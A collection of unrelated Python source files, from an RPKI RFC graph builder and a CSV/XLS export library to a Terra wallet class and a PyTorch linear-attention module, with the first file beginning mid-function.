if (rfc.startswith("RFC")):
rfcs.append(rfc)
return rfcs
# Adapted from https://github.com/AndreaOlivieri/rfc2json.git
def parse_rfc_meta(self, match, rfc_number, json_obj):
if re.search("Not Issued", match[1]):
json_obj[rfc_number] = "Not Issued"
else:
json_sub_obj = {}
title_authours_date = self.clean_text(match[2])
authors = re.findall(__AUTHORS_REGEX__, title_authours_date)
title = re.sub(__AUTHORS_REGEX__, '', title_authours_date, flags=re.MULTILINE | re.UNICODE | re.DOTALL)
json_sub_obj["authors"] = authors
date = re.findall(__DATE_REGEX__, title_authours_date)[0]
month = date[0]
year = date[1]
json_sub_obj["title"] = title.replace(". "+month+" "+year, "")
json_sub_obj["issue_data"] = {
"month": month,
"year": year
}
if match[3]!="": json_sub_obj["format"] = re.findall(__FORMAT_REGEX__, self.clean_text(match[3]))[0]
if match[4]!="": json_sub_obj["obsolets"] = self.clear_rfc(re.findall(__RFC_REGEX__, self.clean_text(match[4])))
if match[5]!="": json_sub_obj["obsoleted_by"] = self.clear_rfc(re.findall(__RFC_REGEX__, self.clean_text(match[5])))
if match[6]!="": json_sub_obj["updates"] = self.clear_rfc(re.findall(__RFC_REGEX__, self.clean_text(match[6])))
if match[7]!="": json_sub_obj["updated_by"] = self.clear_rfc(re.findall(__RFC_REGEX__, self.clean_text(match[7])))
if match[8]!="": json_sub_obj["also_fyi"] = re.findall(__ALSO_FYI_REGEX__, self.clean_text(match[8]))[0]
if match[9]!="": json_sub_obj["status"] = re.findall(__STATUS_REGEX__, self.clean_text(match[9]))[0]
if match[10]!="": json_sub_obj["doi"] = re.findall(__DOI_REGEX__, self.clean_text(match[10]))[0]
json_obj[rfc_number] = json_sub_obj
def rfcs_json_data(self):
rfc_index_text = open(self.rfcs_index_file).read()
rfcs_json_obj = {}
matches = re.findall(__COMPLETE_REGEX__, rfc_index_text)
for match in matches:
rfc_number = match[0]
self.parse_rfc_meta(match, rfc_number, rfcs_json_obj)
return rfcs_json_obj
def rfcs_name_category(self, data):
categories = {}
rfcs_map = {}
for k,v in data.items():
if v == 'Not Issued':
continue
status = v['status']
caterogy_id = "_".join(status.split(" "))
# Special case
if int(k) == 4271:
caterogy_id = "PROPOSED_STANDARD"
if 'STANDARD' in caterogy_id:
caterogy_id = "STANDARD"
elif 'BEST' in caterogy_id:
    caterogy_id = "BCP"
if caterogy_id not in categories.keys():
categories[caterogy_id] = [k]
else:
categories[caterogy_id].append(k)
rfcs_map['RFC'+str(k)] = "RFCS." + str(caterogy_id) + "." + 'RFC'+str(k)
return categories, rfcs_map
def add_param_to_graph(self, elements, rfc_list, extended_rfcs, rfcs_groups, summaries):
from_set = set()
to_set = set()
for elm in elements:
from_set.add(elm['from'])
to_set.add(elm['to'])
for elm in elements:
tmp = elm['from'].split(".")[-1].strip('RFC')
rfc_content = None
if tmp in summaries.keys():
rfc_content = "".join(summaries[tmp])
if 'color' not in elm.keys():
if int(tmp) in rfc_list:
if str(tmp) in summaries.keys():
elm['color'] = '#ffc107'
elm['summary'] = rfc_content
else:
elm['color'] = 'blue'
elm['summary'] = rfc_content
else:
elm['color'] = 'grey'
elm['summary'] = rfc_content
for elm in extended_rfcs:
tmp = elm.split(".")[-1].strip('RFC')
rfc_content = None
if tmp in summaries.keys():
rfc_content = "".join(summaries[tmp])
if elm in to_set:
if int(tmp) in rfc_list:
if str(tmp) in summaries.keys():
color = '#ffc107'
else:
color = "blue"
else:
color = "grey"
elm_data = {
'from': elm,
'to': None,
'kind': None,
'color': color,
'summary': rfc_content,
'group': rfcs_groups[elm.split(".")[-1]]
}
if elm not in from_set:
if int(tmp) in rfc_list:
if str(tmp) in summaries.keys():
color = '#ffc107'
else:
color = "blue"
else:
color = "grey"
elm_data = {
'from': elm,
'to': None,
'kind': None,
'color': color,
'summary': rfc_content,
'group': rfcs_groups[elm.split(".")[-1]]
}
if elm_data not in elements:
elements.append(elm_data)
return elements
def add_tooltip_to_graph(self, data, elements):
for rfc, record in data.items():
if record != 'Not Issued':
status = record['status']
issue_data = record['issue_data']
title = record['title']
authors = record['authors']
title_formated = ""
title_list = title.split()
limit = int(len(title_list)/2)
if len(title_list) > 10:
title_formated += " ".join(title_list[:limit])
title_formated += "</br>"
title_formated += " ".join(title_list[limit:])
else:
title_formated = title
if int(rfc) == 4271:
status = "PROPOSED STANDARD"
rfc_title = "<div>"
rfc_title += "<strong>RFC</strong>:" + rfc+ "</br>"
rfc_title += "<strong>Title</strong>:" + str(title_formated) + "</br>"
rfc_title += "<strong>Category</strong>:" + status + "</br>"
rfc_title += "<strong>Authors</strong>:"
rfc_title += "<ul>"
for auth in authors:
rfc_title += "<li>" + auth + "</li>"
rfc_title += "</ul>"
rfc_title += "<strong>Issue Date</strong>:" + issue_data['month']+" " + issue_data['year'] + "</br>"
rfc_title += "<strong>Url</strong>: https://tools.ietf.org/html/rfc" + str(rfc)
rfc_title += "</div>"
for elm in elements:
tmp = elm['from'].split(".")[-1].strip('RFC')
if int(tmp) == int(rfc):
elm['title'] = rfc_title
return elements
def format_d3js_data(self, data, rfc_list, summaries, groups):
categories, rfcs_map = self.rfcs_name_category(data)
rfcs_groups = {y:k for k,v in groups.items() for y in v}
elements = []
extended_rfcs = []
for _,rfcs in categories.items():
rfcs_filtered = [x for x in rfcs if int(x) in rfc_list ]
named_rfcs_filtered = ['RFC'+str(x) for x in rfcs_filtered ]
for rfc in rfcs_filtered:
record = data[rfc]
if 'obsolets' in record:
for ed in record['obsolets']:
if ed not in named_rfcs_filtered:
named_rfcs_filtered.append(ed)
if rfc not in named_rfcs_filtered:
named_rfcs_filtered.append('RFC'+str(rfc))
current_relation = {
'from': rfcs_map['RFC'+str(rfc)],
'to': rfcs_map[ed],
'kind': 'OBSOLETE',
'group': rfcs_groups['RFC'+str(rfc)]
}
if current_relation not in elements:
elements.append(current_relation)
if 'obsoleted_by' in record:
for ed in record['obsoleted_by']:
if ed not in named_rfcs_filtered:
named_rfcs_filtered.append(ed)
if rfc not in named_rfcs_filtered:
named_rfcs_filtered.append('RFC'+str(rfc))
current_relation = {
'from': rfcs_map[ed],
'to': rfcs_map['RFC'+str(rfc)],
'kind': 'OBSOLETE',
'group': rfcs_groups[ed]
}
if current_relation not in elements:
elements.append(current_relation)
if 'updates' in record:
for ed in record['updates']:
if ed not in named_rfcs_filtered:
named_rfcs_filtered.append(ed)
if rfc not in named_rfcs_filtered:
named_rfcs_filtered.append('RFC'+str(rfc))
current_relation = {
'from': rfcs_map['RFC'+str(rfc)],
'to': rfcs_map[ed],
'kind': 'UPDATE',
'group': rfcs_groups['RFC'+str(rfc)]
}
if current_relation not in elements:
elements.append(current_relation)
if 'updated_by' in record:
for ed in record['updated_by']:
if ed not in named_rfcs_filtered:
named_rfcs_filtered.append(ed)
if rfc not in named_rfcs_filtered:
named_rfcs_filtered.append('RFC'+str(rfc))
current_relation = {
'from': rfcs_map[ed],
'to': rfcs_map['RFC'+str(rfc)],
'kind': 'UPDATE',
'group': rfcs_groups[ed]
}
if current_relation not in elements:
elements.append(current_relation)
extended_rfcs.extend(named_rfcs_filtered)
extended_rfcs = [rfcs_map[x] for x in set(extended_rfcs)]
# Add color and information for new RFCs found by following the update/obsolete relationships
elements = self.add_param_to_graph(elements, rfc_list, extended_rfcs, rfcs_groups, summaries)
# Add title data (tooltip)
elements = self.add_tooltip_to_graph(data, elements)
# for k in elements:
# print(k['from'], k['color'], k['group'])
return elements
def create(self):
try:
# Get RPKI RFCs list
print("#"*5 + "= Getting RPKI RFCs list =" + "#"*5)
self.rpki_rfcs = self.get_rpki_rfcs(self.rpki_rfcs_file)
# Get all RFCs from the index file
print("#"*5 + "= Downloading RFCs Index file =" + "#"*5)
rfcs_index_file = self.get_rfcs_index(self.rfcs_index_file)
print("#"*5 + "= Creatin RPKI RFCs summaries =" + "#"*5)
# Create and format summaries by reading Markdown template
sum_info = RFCsSummaries(templates_path=self.summaries_folder, result_file=self.summaries_filename)
self.summaries = sum_info.get()
print("#"*5 + "= Getting RPKI RFCs groups =" + "#"*5)
# read RFC groups (MUST, MAY and SHOULD)
grp_info = RFCsGroups(groups_file=self.groups_file)
self.groups = grp_info.get()
print("#"*5 + "= Formating RFCs data =" + "#"*5)
if rfcs_index_file:
self.rfcs_json_obj = self.rfcs_json_data()
if self.rpki_rfcs and self.rfcs_json_obj and self.summaries and self.groups:
self.d3js_data = self.format_d3js_data(self.rfcs_json_obj, self.rpki_rfcs, self.summaries, self.groups)
if self.save_graph_data(self.d3js_data):
print("#"*5 + "= RPKI RFCs Graph saved in file " + str(self.graph_file) +" =" + "#"*5)
except Exception as err:
return err
return True
def save_graph_data(self, elements):
try:
with open(self.graph_file, 'w') as outfile:
json.dump(elements, outfile)
except:
return False
return True
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Build RPKI RFCs graph data.')
parser.add_argument('-r', '--rfcs', help='RPKI RFCs list (one RFC per line)', required=True)
args = vars(parser.parse_args())
rpki_rfcs_file_path = args['rfcs']
graph = RFCsGraph(rpki_rfcs_file_path,
rfcs_index_file="./data/rfc-index.txt",
templates_path="./summaries",
summaries_result_file="./data/rfcs_summaries.json",
groups_file="./data/rfcs_groups.json",
graph_file="./html/data/rfcs_data.json")
graph.create()
|
from . circuit_element_group import CircuitElementGroup
from . bus import Bus
class BusGroup(CircuitElementGroup):
dss_module_name = 'Bus'
ele_class = Bus
def _collect_names(self, dss):
""" Override super() to use dss.Circuit.AllBusNames()"""
self._names = dss.Circuit.AllBusNames()
self._populate_name_idx_dicts()
|
from skimage import data
from skimage.filters.rank import median
from skimage.morphology import disk
from skimage.viewer import ImageViewer
from skimage.viewer.widgets import Slider, OKCancelButtons, SaveButtons
from skimage.viewer.plugins.base import Plugin
def median_filter(image, radius):
return median(image, selem=disk(radius))
image = data.coins()
viewer = ImageViewer(image)
plugin = Plugin(image_filter=median_filter)
plugin += Slider('radius', 2, 10, value_type='int')
plugin += SaveButtons()
plugin += OKCancelButtons()
viewer += plugin
viewer.show()
|
import numpy as np
import cv2
# Load the image as grayscale (flag 0)
img = cv2.imread('c:\\users\\lenovo\\desktop\\bjork.jpg', 0)
cv2.imshow('Bjork', img)
k = cv2.waitKey(0)
if k == 27:  # Esc: close without saving
    cv2.destroyAllWindows()
elif k == ord('s'):  # 's': save a grayscale copy, then close
    cv2.imwrite('deepgray.jpg', img)
    cv2.destroyAllWindows()
|
from fastapi import APIRouter, Depends
from core.dependencies import init_service
from models.quiz import QuizInResponsePartial
from services.quiz import QuizService
router = APIRouter()
@router.get('/{post_id}', response_model=QuizInResponsePartial)
async def get_quiz_by_post_id(post_id: int, service: QuizService = Depends(init_service(QuizService))):
quiz = await service.get_by_post_id(post_id)
return quiz
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Common library to export either CSV or XLS.
"""
import gc
import logging
import numbers
import openpyxl
import re
import six
import StringIO
import tablib
from django.http import StreamingHttpResponse, HttpResponse
from django.utils.encoding import smart_str
from desktop.lib import i18n
LOG = logging.getLogger(__name__)
ILLEGAL_CHARS = r'[\000-\010]|[\013-\014]|[\016-\037]'
def nullify(cell):
return cell if cell is not None else "NULL"
def encode_row(row, encoding=None):
encoded_row = []
for cell in row:
if isinstance(cell, six.string_types):
cell = re.sub(ILLEGAL_CHARS, '?', cell)
cell = nullify(cell)
if not isinstance(cell, numbers.Number):
cell = smart_str(cell, encoding or i18n.get_site_encoding(), strings_only=True, errors='replace')
encoded_row.append(cell)
return encoded_row
def dataset(headers, data, encoding=None):
"""
dataset(headers, data) -> Dataset object
Return a dataset object for a csv or excel document.
"""
dataset = tablib.Dataset()
if headers:
dataset.headers = encode_row(headers, encoding)
for row in data:
dataset.append(encode_row(row, encoding))
return dataset
class XlsWrapper():
def __init__(self, xls):
self.xls = xls
def xls_dataset(workbook):
output = StringIO.StringIO()
workbook.save(output)
output.seek(0)
return XlsWrapper(output.read())
def create_generator(content_generator, format, encoding=None):
if format == 'csv':
show_headers = True
for headers, data in content_generator:
yield dataset(show_headers and headers or None, data, encoding).csv
show_headers = False
elif format == 'xls':
workbook = openpyxl.Workbook(write_only=True)
worksheet = workbook.create_sheet()
row_ctr = 0
for _headers, _data in content_generator:
# Write headers to workbook once
if _headers and row_ctr == 0:
worksheet.append(encode_row(_headers, encoding))
row_ctr += 1
# Write row data to workbook
for row in _data:
worksheet.append(encode_row(row, encoding))
row_ctr += 1
yield xls_dataset(workbook).xls
gc.collect()
else:
raise Exception("Unknown format: %s" % format)
def make_response(generator, format, name, encoding=None):
"""
@param data An iterator of rows, where every row is a list of strings
@param format Either "csv" or "xls"
@param name Base name for output file
@param encoding Unicode encoding for data
"""
if format == 'csv':
content_type = 'application/csv'
resp = StreamingHttpResponse(generator, content_type=content_type)
try:
del resp['Content-Length']
except KeyError:
pass
elif format == 'xls':
format = 'xlsx'
content_type = 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
resp = HttpResponse(next(generator), content_type=content_type)
elif format == 'json':
content_type = 'application/json'
resp = HttpResponse(generator, content_type=content_type)
else:
raise Exception("Unknown format: %s" % format)
resp['Content-Disposition'] = 'attachment; filename="%s.%s"' % (name, format)
return resp
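# Illustrative usage inside a view (a sketch, not part of this module). The
# `result_rows()` generator is hypothetical; it must yield (headers, rows) pairs.
#
#   def download(request):
#       generator = create_generator(result_rows(), 'csv', encoding='utf-8')
#       return make_response(generator, 'csv', 'query_result', encoding='utf-8')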
|
# ----------------------------------------------------------------
# YDK - YANG Development Kit
# Copyright 2016-2019 Cisco Systems
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------
# This file has been modified by Yan Gorelik, YDK Solutions.
# All modifications in original under CiscoDevNet domain
# introduced since October 2019 are copyrighted.
# All rights reserved under Apache License, Version 2.0.
# ------------------------------------------------------------------
"""
class_meta_printer.py
YANG model driven API, class emitter.
"""
from ydkgen.api_model import Class, Enum, Property
from ydkgen.common import sort_classes_at_same_level, get_module_name, is_config_stmt
from ydkgen.printer.meta_data_util import get_meta_info_data
from .enum_printer import EnumPrinter
class ClassMetaPrinter(object):
def __init__(self, ctx, one_class_per_module, identity_subclasses=None):
self.ctx = ctx
self.is_rpc = False
self.one_class_per_module = one_class_per_module
self.identity_subclasses = identity_subclasses
def print_output(self, unsorted_classes):
''' This arranges the classes at the same level
so that super references are printed before
the subclasses'''
sorted_classes = sort_classes_at_same_level(unsorted_classes)
for clazz in sorted_classes:
self.print_class_meta(clazz)
def print_parents(self, unsorted_classes):
''' This arranges the classes at the same level
so that super references are printed before
the subclasses'''
sorted_classes = sort_classes_at_same_level(unsorted_classes)
for clazz in sorted_classes:
self._print_meta_parents(clazz)
def _print_meta_parents(self, clazz):
nested_classes = sort_classes_at_same_level(
[nested_class for nested_class in clazz.owned_elements if isinstance(nested_class, Class)])
self.print_parents(nested_classes)
for nested_class in nested_classes:
self.ctx.writeln('_meta_table[\'%s\'][\'meta_info\'].parent =_meta_table[\'%s\'][\'meta_info\']' % (
nested_class.qn(), clazz.qn()))
def print_class_meta(self, clazz):
if clazz.is_rpc():
self.is_rpc = True
self.print_output(
[nested_class for nested_class in clazz.owned_elements if isinstance(nested_class, Class)])
enumz = []
enumz.extend([nested_enum for nested_enum in clazz.owned_elements if isinstance(
nested_enum, Enum)])
for nested_enumz in sorted(enumz, key=lambda e: e.name):
EnumPrinter(self.ctx).print_enum_meta(nested_enumz)
self._print_meta_member(clazz)
def _print_meta_member(self, clazz):
mtype = 'REFERENCE_CLASS'
if clazz.stmt.keyword == 'list':
mtype = 'REFERENCE_LIST'
elif clazz.stmt.keyword == 'leaf-list':
mtype = 'REFERENCE_LEAFLIST'
elif clazz.stmt.keyword == 'identity':
mtype = 'REFERENCE_IDENTITY_CLASS'
self.ctx.writeln('\'%s\': {' % (clazz.qn()))
self.ctx.lvl_inc()
self.ctx.writeln("'meta_info': _MetaInfoClass(")
self.ctx.lvl_inc()
self.ctx.writeln("'%s', %s," % (clazz.qn(), mtype))
description = " "
for st in clazz.stmt.substmts:
if st.keyword == 'description':
description = st.arg
break
self.ctx.writeln('"""%s""",' % description)
if clazz.is_grouping():
self.ctx.writeln('True, ')
else:
self.ctx.writeln('False, ')
self.ctx.writeln('[')
if self.is_rpc:
prop_list = [p for p in clazz.owned_elements if isinstance(p, Property)]
else:
prop_list = clazz.properties()
for prop in prop_list:
meta_info_data = get_meta_info_data(
prop, prop.property_type, prop.stmt.search_one('type'), 'py',
self.identity_subclasses)
self.print_meta_class_member(meta_info_data, self.ctx)
self.ctx.writeln('],')
module_name = "%s" % get_module_name(clazz.stmt)
self.ctx.writeln("'%s'," % module_name)
self.ctx.writeln("'%s'," % clazz.stmt.arg)
if clazz.is_grouping():
self.ctx.writeln('None,')
else:
self.ctx.writeln("_yang_ns.NAMESPACE_LOOKUP['%s']," % module_name)
self.ctx.writeln("'%s'," % clazz.get_py_mod_name())
if mtype == 'REFERENCE_CLASS' or mtype == 'REFERENCE_LIST':
if not is_config_stmt(clazz.stmt):
self.ctx.writeln("is_config=False,")
if clazz.stmt.search_one('presence'):
self.ctx.writeln("is_presence=True,")
if clazz.stmt.search_one('mandatory'):
self.ctx.writeln("has_mandatory=True,")
if clazz.stmt.search_one('when'):
self.ctx.writeln("has_when=True,")
if clazz.stmt.search_one('must'):
self.ctx.writeln("has_must=True,")
self.ctx.lvl_dec()
self.ctx.writeln('),')
self.ctx.lvl_dec()
self.ctx.writeln('},')
def print_meta_class_member(self, meta_info_data, ctx):
if meta_info_data is None:
return
name = meta_info_data.name
mtype = meta_info_data.mtype
ptype = meta_info_data.ptype
ytype = meta_info_data.ytype
pmodule_name = meta_info_data.pmodule_name
clazz_name = meta_info_data.clazz_name
prange = meta_info_data.prange
pattern = meta_info_data.pattern
presentation_name = meta_info_data.presentation_name
max_elements = meta_info_data.max_elements
min_elements = meta_info_data.min_elements
default_value_object = meta_info_data.default_value_object
ctx.writeln(" _MetaInfoClassMember(")
ctx.lvl_inc()
ctx.writeln("'%s', %s, '%s', '%s'," % (name, mtype, ptype, ytype))
ctx.writeln("%s, %s," % (pmodule_name, clazz_name))
ctx.writeln("%s, %s," % (str(prange), str(pattern)))
ctx.writeln('"""')
if meta_info_data.comment is not None:
for line in meta_info_data.comment.split('\n'):
ctx.writeln('%s' % line)
ctx.writeln('""",')
ctx.writeln("'%s'," % presentation_name)
if len(meta_info_data.children) > 0:
ctx.writeln(
"'%s', %s, [" % (meta_info_data.module_name, meta_info_data.is_key))
ctx.lvl_inc()
for child_meta_info_data in meta_info_data.children:
self.print_meta_class_member(child_meta_info_data, ctx)
ctx.lvl_dec()
ctx.write(']')
else:
ctx.write("'%s', %s" %
(meta_info_data.module_name, meta_info_data.is_key))
if max_elements:
ctx.str(", max_elements=%s" % max_elements)
if min_elements:
ctx.str(", min_elements=%s" % min_elements)
if default_value_object:
ctx.str(", default_value=%s" % default_value_object)
if not meta_info_data.is_config:
ctx.str(", is_config=False")
if meta_info_data.is_presence:
ctx.str(", is_presence=True")
if meta_info_data.mandatory:
ctx.str(", is_mandatory=True")
if meta_info_data.has_when:
ctx.str(", has_when=True")
if meta_info_data.has_must:
ctx.str(", has_must=True")
ctx.str('),\n')
ctx.lvl_dec()
|
from __future__ import annotations
from contextlib import contextmanager
from typing import List, Optional, Union
import jigu.client.terra
from jigu.client.object_query import AccountQuery
from jigu.core import StdFee, StdMsg, StdSignMsg, StdTx
from jigu.key import Key
__all__ = ["Wallet"]
class Wallet(AccountQuery):
"""A Wallet is an augmented AccountQuery, and provides `chain_id`, `account_number`,
and `sequence` information for signing transactions, which is performed by a Key."""
def __init__(self, terra: jigu.client.terra.Terra, key: Key):
AccountQuery.__init__(self, terra, key.acc_address)
self.key = key
self.terra = terra
self._account_number = 0
self._manual_sequence = False
self._sequence = None
def __repr__(self) -> str:
return f"Wallet<{self.address}> -> {self.terra}"
@property
def account_number(self) -> int:
"""Account number is fetched for the first time it is found, then saved."""
if self._account_number == 0:
self._account_number = self.info().account_number
return self._account_number
@property
def sequence(self) -> int:
"""Property that dynamically fetches sequence number everytime it is called."""
return self.info().sequence
def create_tx(
self, *msgs: StdMsg, fee: Optional[StdFee] = None, memo: str = "",
) -> StdSignMsg:
"""Creates a sign message (`StdSignMsg`), which contains the necessary info to
sign the transaction. Helpful to think of it as "create unsigned tx".
"""
if not fee:
# estimate our fee if fee not supplied
tx = StdTx(msg=msgs, memo=memo)
fee = self.terra.tx.estimate_fee(tx)
if self._manual_sequence:
sequence = self._sequence
self._sequence += 1
else:
sequence = self.sequence
return StdSignMsg(
chain_id=self.terra.chain_id,
account_number=self.account_number,
sequence=sequence,
fee=fee,
msgs=msgs,
memo=memo,
)
def sign_tx(self, *args, **kwargs):
"""Uses the Wallet's key to sign the transaction."""
return self.key.sign_tx(*args, **kwargs)
def create_and_sign_tx(
self, *msgs: StdMsg, fee: Optional[StdFee] = None, memo: str = "",
) -> StdTx:
"""Creates a sign message, signs it, and produces a transaction in one go.
Outputs a ready-to-broadcast `StdTx`.
"""
return self.sign_tx(self.create_tx(*msgs, fee=fee, memo=memo))
@contextmanager
def manual(self) -> Wallet:
"""Manual mode is a context that creates sign messages (and transactions) with the
sequence number incremented on each TX generation rather than polling from the
blockchain every time, so they can be saved and broadcasted at a later time.
"""
self._sequence = self.sequence
self._manual_sequence = True
yield self
self._manual_sequence = False
def broadcast(self, *args, **kwargs):
return self.terra.tx.broadcast(*args, **kwargs)
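# Illustrative usage (a sketch, not part of the module; `terra`, `key` and `msg`
# are assumed to be created elsewhere):
#
#   wallet = Wallet(terra, key)
#   tx = wallet.create_and_sign_tx(msg, memo="hello")
#   wallet.broadcast(tx)
#
#   # Manual mode: the sequence number is incremented locally, so several
#   # transactions can be prepared now and broadcast later.
#   with wallet.manual() as w:
#       txs = [w.create_and_sign_tx(msg) for _ in range(3)]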
|
"""Implement unmasked linear attention."""
import torch
from torch.nn import Module
from ..attention_registry import AttentionRegistry, Optional, Callable, Int, \
EventDispatcherInstance
from ..events import EventDispatcher
from ..feature_maps import elu_feature_map
class LinearAttention(Module):
"""Implement unmasked attention using dot product of feature maps in
O(N D^2) complexity.
Given the queries, keys and values as Q, K, V instead of computing
V' = softmax(Q.mm(K.t()), dim=-1).mm(V),
we make use of a feature map function Φ(.) and perform the following
computation
V' = normalize(Φ(Q).mm(Φ(K).t())).mm(V).
The above can be computed in O(N D^2) complexity where D is the
dimensionality of Q, K and V and N is the sequence length. Depending on the
feature map, however, the complexity of the attention might be limited.
Arguments
---------
feature_map: callable, a callable that applies the feature map to the
last dimension of a tensor (default: elu(x)+1)
eps: float, a small number to ensure the numerical stability of the
denominator (default: 1e-6)
event_dispatcher: str or EventDispatcher instance to be used by this
module for dispatching events (default: the default
global dispatcher)
"""
def __init__(self, query_dimensions, feature_map=None, eps=1e-6,
event_dispatcher=""):
super(LinearAttention, self).__init__()
self.feature_map = (
feature_map(query_dimensions) if feature_map else
elu_feature_map(query_dimensions)
)
self.eps = eps
self.event_dispatcher = EventDispatcher.get(event_dispatcher)
def forward(self, queries, keys, values, attn_mask, query_lengths,
key_lengths):
# Apply the feature map to the queries and keys
self.feature_map.new_feature_map(queries.device)
Q = self.feature_map.forward_queries(queries)
K = self.feature_map.forward_keys(keys)
# Apply the key padding mask and make sure that the attn_mask is
# all_ones
if not attn_mask.all_ones:
raise RuntimeError(("LinearAttention does not support arbitrary "
"attention masks"))
K = K * key_lengths.float_matrix[:, :, None, None]
# Compute the KV matrix, namely the dot product of keys and values so
# that we never explicitly compute the attention matrix and thus
# decrease the complexity
KV = torch.einsum("nshd,nshm->nhmd", K, values)
# Compute the normalizer
Z = 1/(torch.einsum("nlhd,nhd->nlh", Q, K.sum(dim=1))+self.eps)
# Finally compute and return the new values
V = torch.einsum("nlhd,nhmd,nlh->nlhm", Q, KV, Z)
return V.contiguous()
# Register the attention implementation so that it becomes available in our
# builders
AttentionRegistry.register(
"linear", LinearAttention,
[
("query_dimensions", Int),
("feature_map", Optional(Callable)),
("event_dispatcher", Optional(EventDispatcherInstance, ""))
]
)
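# Hedged self-check (not part of the library): a tiny sketch of the einsum formulation
# used above, applying elu(x)+1 directly instead of going through `elu_feature_map`
# (an assumption made for brevity). Guarded so it never runs on import.
if __name__ == "__main__":
    import torch.nn.functional as F
    n, l, h, d, m = 2, 4, 1, 8, 8
    q, k = torch.randn(n, l, h, d), torch.randn(n, l, h, d)
    v = torch.randn(n, l, h, m)
    Q, K = F.elu(q) + 1, F.elu(k) + 1
    KV = torch.einsum("nshd,nshm->nhmd", K, v)          # keys x values, O(N D^2)
    Z = 1 / (torch.einsum("nlhd,nhd->nlh", Q, K.sum(dim=1)) + 1e-6)  # normalizer
    out = torch.einsum("nlhd,nhmd,nlh->nlhm", Q, KV, Z)
    assert out.shape == (n, l, h, m)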
|
# ------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.
# ------------------------------------------------------------------------------------------
from typing import Any, Dict, List, Optional, Set, Tuple, Union
import pytorch_lightning as pl
import torch
from pl_bolts.callbacks.ssl_online import SSLOnlineEvaluator
from pl_bolts.models.self_supervised.evaluator import SSLEvaluator
from pytorch_lightning.metrics import Metric
from torch import Tensor as T
from torch.nn import functional as F
from InnerEye.ML.SSL.utils import SSLDataModuleType
from InnerEye.ML.lightning_metrics import Accuracy05, AreaUnderPrecisionRecallCurve, AreaUnderRocCurve
BatchType = Union[Dict[SSLDataModuleType, Any], Any]
class SSLOnlineEvaluatorInnerEye(SSLOnlineEvaluator):
def __init__(self,
learning_rate: float,
class_weights: Optional[torch.Tensor] = None,
**kwargs: Any) -> None:
"""
Creates a hook to evaluate a linear model on top of an SSL embedding.
        :param learning_rate: The learning rate of the Adam optimizer used to train the linear head.
        :param class_weights: The class weights to use when computing the cross entropy loss. If set to None,
        no weighting will be done.
"""
super().__init__(**kwargs)
self.weight_decay = 1e-4
self.learning_rate = learning_rate
self.train_metrics: List[Metric] = [AreaUnderRocCurve(), AreaUnderPrecisionRecallCurve(),
Accuracy05()] \
if self.num_classes == 2 else [Accuracy05()]
self.val_metrics: List[Metric] = [AreaUnderRocCurve(), AreaUnderPrecisionRecallCurve(),
Accuracy05()] \
if self.num_classes == 2 else [Accuracy05()]
self.class_weights = class_weights
def on_pretrain_routine_start(self, trainer: pl.Trainer, pl_module: pl.LightningModule) -> None:
"""
Initializes modules and moves metrics and class weights to module device
"""
for metric in [*self.train_metrics, *self.val_metrics]:
metric.to(device=pl_module.device) # type: ignore
pl_module.non_linear_evaluator = SSLEvaluator(n_input=self.z_dim,
n_classes=self.num_classes,
p=self.drop_p,
n_hidden=self.hidden_dim).to(pl_module.device)
assert isinstance(pl_module.non_linear_evaluator, torch.nn.Module)
self.optimizer = torch.optim.Adam(pl_module.non_linear_evaluator.parameters(),
lr=self.learning_rate,
weight_decay=self.weight_decay)
@staticmethod
def to_device(batch: Any, device: Union[str, torch.device]) -> Tuple[T, T]:
"""
Moves batch to device.
:param device: device to move the batch to.
"""
_, x, y = batch
return x.to(device), y.to(device)
def on_train_epoch_start(self, trainer: pl.Trainer, pl_module: pl.LightningModule) -> None:
self.visited_ids: Set[Any] = set()
def on_validation_epoch_start(self, trainer: pl.Trainer, pl_module: pl.LightningModule) -> None:
self.visited_ids = set()
def shared_step(self, batch: BatchType, pl_module: pl.LightningModule, is_training: bool) -> T:
"""
        Forward pass and MLP loss computation for the linear head only. Representations from the encoder are frozen and
        detached from the computation graph for this loss computation.
Returns cross-entropy loss for the input batch.
"""
batch = batch[SSLDataModuleType.LINEAR_HEAD] if isinstance(batch, dict) else batch
x, y = self.to_device(batch, pl_module.device)
with torch.no_grad():
representations = self.get_representations(pl_module, x)
representations = representations.detach()
assert isinstance(pl_module.non_linear_evaluator, torch.nn.Module)
# Run the linear-head with SSL embeddings.
mlp_preds = pl_module.non_linear_evaluator(representations)
weights = None if self.class_weights is None else self.class_weights.to(device=pl_module.device)
mlp_loss = F.cross_entropy(mlp_preds, y, weight=weights)
with torch.no_grad():
posteriors = F.softmax(mlp_preds, dim=-1)
for metric in (self.train_metrics if is_training else self.val_metrics):
metric(posteriors, y) # type: ignore
return mlp_loss
def on_validation_batch_end(self, trainer: pl.Trainer,
pl_module: pl.LightningModule,
outputs: Any,
batch: BatchType,
batch_idx: int,
dataloader_idx: int) -> None: # type: ignore
"""
Get and log validation metrics.
"""
ids_linear_head = tuple(batch[SSLDataModuleType.LINEAR_HEAD][0].tolist())
if ids_linear_head not in self.visited_ids:
self.visited_ids.add(ids_linear_head)
loss = self.shared_step(batch, pl_module, is_training=False)
pl_module.log('ssl_online_evaluator/val/loss', loss, on_step=False, on_epoch=True, sync_dist=False)
for metric in self.val_metrics:
pl_module.log(f"ssl_online_evaluator/val/{metric.name}", metric, on_epoch=True,
on_step=False) # type: ignore
